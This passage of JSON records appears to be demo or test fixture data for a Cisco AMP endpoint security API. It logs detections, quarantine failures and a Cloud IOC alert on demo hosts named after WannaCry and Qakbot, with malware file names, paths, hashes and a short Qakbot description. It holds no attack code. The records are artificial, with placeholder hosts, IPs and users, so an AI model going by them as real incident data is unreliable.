Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 